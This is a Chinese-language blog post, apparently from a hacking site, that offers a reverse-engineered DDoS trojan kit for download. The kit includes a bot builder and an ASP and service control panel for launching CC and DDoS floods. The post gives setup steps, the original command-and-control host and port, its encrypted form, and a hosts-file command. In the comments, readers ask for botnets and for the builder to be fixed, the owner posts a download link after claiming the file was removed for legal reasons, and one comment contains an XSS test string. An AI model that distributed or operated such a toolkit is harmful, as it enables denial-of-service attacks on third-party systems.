Asp + 后台服务控制的 DDOS 木马

PC列表

Asp + 后台服务控制的 DDOS 木马

数据库CC攻击列表

Asp + 后台服务控制的 DDOS 木马

数据库DDOS攻击列表

Asp + 后台服务控制的 DDOS 木马

添加CC攻击

Asp + 后台服务控制的 DDOS 木马

添加DDOS攻击

Asp + 后台服务控制的 DDOS 木马

控制端DDOS攻击列表

Asp + 后台服务控制的 DDOS 木马

http攻击服务端管理器

这是大概在2年前,某个朋友发来一个 DDOS 的小马,叫我帮忙逆向破解掉,然后写出生成器,并且可以使用原始上线系统进行控制(Asp+NTsv)。

后来花了些时间研究了木马运行流程、上线方式、上线地址、上线地址加密算法等,写了完整的小马生成器,以及配套的整套控制系统。

现在把整套源码、小马生成器、后台控制系统、以及各种文档打包发出来,年代久远,可能跟不上时代了,有兴趣的可以研究下……

使用说明:

-------------------------------------------------
1、修改“控制端\后台服务\attsvr.ini”中的数据库地址:

[GLOBAL]
DBPath=E:\attack\data\att.mdb
-------------------------------------------------
2、“\控制端\后台服务\Reg Dll.bat”注册 DLL。
-------------------------------------------------
3、“\控制端\后台服务\attmangr.exe”运行后台服务。
-------------------------------------------------

+++++++++++++++++++++++++++++++++++++++++++++++++
原始上线地址:att.0579925.com:55110
原始管理地址:http://att.0579925.com/
上线地址密文:17EFE4D935497069977FF3F0D02B8393
+++++++++++++++++++++++++++++++++++++++++++++++++
netacc.exe  :cmd.exe /c echo 255.255.255.255 att.0579925.com>>%windir%\system32\drivers\etc\hosts
netprot.exe :taskkill /im netacc.exe /f
+++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++++++++++++++++++++++++++++
运行方式:
+++++++++++++++++++++++++++++++++++++++++++++++++
A、后台管理依靠 80 端口通讯,使用 Asp 脚本进行可视化操作。
B、木马的通讯与控制依靠 55110 端口,使用后台服务程序进行集群控制、发送攻击命令等操作。
C、后台服务程序与 Asp 脚本使用同一个数据库,以达到共享数据的目的。
+++++++++++++++++++++++++++++++++++++++++++++++++

文件列表:

\ASP + 后台服务控制的 DDOS 木马
│  使用说明.txt
│  
├─原木马
│  │  update3.exe
│  │  update6.exe
│  │  
│  └─NetAcc
│          netacc.exe
│          netprot.exe
│          netsvc.dll
│          run.bat
│          
├─控制端
│  ├─Web 管理
│  │  │  cc.asp
│  │  │  ccadd.asp
│  │  │  ccdel.asp
│  │  │  ccedit.asp
│  │  │  cclst.asp
│  │  │  chkupdt.asp
│  │  │  ddadd.asp
│  │  │  dddel.asp
│  │  │  ddedit.asp
│  │  │  ddlst.asp
│  │  │  ddos.asp
│  │  │  inc.asp
│  │  │  login.asp
│  │  │  main.asp
│  │  │  pclst.asp
│  │  │  svrlst.asp
│  │  │  t1.asp
│  │  │  test.asp
│  │  │  top.htm
│  │  │  
│  │  ├─css
│  │  │      style.css
│  │  │      
│  │  └─data
│  │          att.ldb
│  │          att.mdb
│  │          
│  └─后台服务
│          AntiCC.dll
│          att.dll
│          attmangr.exe
│          attsvr.exe
│          attsvr.ini
│          attsvr2.exe
│          attsvr3.exe
│          Reg Dll.bat
│          
├─生成器
│      Form1.frm
│      工程1.vbp
│      工程1.vbw
│      
└─被控端
        bin.dat
        DDOS.exe

下载地址:

Asp + 后台服务控制的 DDOS 木马.rar

留言评论(旧系统):

【匿名者】 @ 2012-10-18 14:44:56

核老总 总是发些过时的东西出来,。好东西应该提前发出来啊,,如果威力过大,就发点思路让大家去琢磨也不错啊 ,,每次来看基本上是些老东西了 。。。希望就像你这个站的标题一样: Nuclear'Atk 网络安全研究中心 这里是 Nuclear'Atk(核攻击)网络安全研究中心,欢迎您的观临!引爆网络核战争!引发网络核危机!制造大规模网络恐慌!强大到变态,制造不可能!核总武器库荣誉出品!走在世界最前端的人,不是天才,就是疯子!迟早有一天,我要统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!哥就是神!极度的权利!Powers!Greater Powers!!! 哈哈 !!!

本站回复:

很多东西不能发,还有一些东西得等过时后或者干脆不发…… ╮(╯_╰)╭ (PS:今天发这个东西,纯属是蛋疼,这种东西本来应该烂在仓库里的……)

【石万里】 @ 2012-10-18 15:20:23

这东西还真是随时随地,指哪打哪…… 老板,先上五斤肉鸡爽一下~

本站回复:

五斤哪够,起码得个五吨……

【匿名者】 @ 2012-10-18 20:55:22

嘿嘿,不能发的和烂在仓库的的神器,没有要你发啊,你发点思路出来也好啊,让大家蛋疼的时候KKOO

本站回复:

╮(╯_╰)╭

【匿名者】 @ 2012-10-18 22:41:21

什么玩意,东西呢?。。。

本站回复:

Sorry,介于用户反应,文件已删除……

我蛋疼啦! @ 2012-10-19 02:00:12

附件呢?求啊.2462723776@qq.com 老大,我就来晚了点.不用这样的吗!楼下排好队型!

本站回复:

Has been deleted...... ╮(╯_╰)╭

【匿名者】 @ 2012-10-19 18:59:56

这个附件谁下载了。。。加好友分享下。。。。。。。。QQ1041501142

本站回复:

囧rz…… ╮(╯_╰)╭

【匿名者】 @ 2012-10-21 14:05:57

还没看呢。已经下载了 某些人要烂JJ了

本站回复:

老东西了,下下来没啥用处……

【匿名者】 @ 2012-10-30 16:19:19

k!学习的机会都不给个,割你7cmjiji!

本站回复:

╮(╯_╰)╭

路人甲 @ 2012-11-26 14:13:36

哥们你写的Asp + 后台服务控制的 DDOS 木马,小马生成出来无法上线啊,其他设置都是正确的,能告诉下生成器填写格式吗

本站回复:

这个不是我写的,很多年前的时候写了个破生成器,现在应该无法使用了吧……

佚名 @ 2012-11-26 22:57:37

晕了不能用了哇。。。。

本站回复:

佚名 @ 2012-11-26 23:25:15

Asp + 后台服务控制的 DDOS 木马 这个生成器能不能重新写啊 最新正好用到这玩意 填ip加端口 老说ip不符合规格

本站回复:

老古董了,重写没有任何意义……

佚名 @ 2014-05-30 10:27:59

<script>alert(/xss/)</script>

本站回复:

<script>alert(/what the fuck~/)</script>

核总,别坑我 @ 2014-11-11 15:21:23

我要下载啊,核总 你别这样~给我下载。我要下载~~~~~~~~~

本站回复:

额,法律问题,删除了。

佚名 @ 2014-11-20 01:22:39

核总还能给一份么

本站回复:

下载地址:http://lcx.cc/File.asp?md5=4f9ec13afee1c046c2f40989cda02e79

呵的俄罗斯联 @ 2015-02-28 10:30:12

谢谢了,不错,找半天只有你的能用!~~

本站回复:

-_-|||